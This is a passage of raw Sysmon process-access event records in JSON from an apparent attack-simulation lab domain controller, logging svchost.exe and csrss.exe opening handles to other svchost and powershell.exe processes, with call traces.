C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":919,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":920,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":921,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":922,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.459\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1240\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nTargetProcessId: 2116\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.459","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"1240","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","TargetProcessId":"2116","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":923,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.459\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nTargetProcessId: 2116\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.459","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","TargetProcessId":"2116","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":924,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.459\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.459","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":925,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.459\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.459","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":926,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.459\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 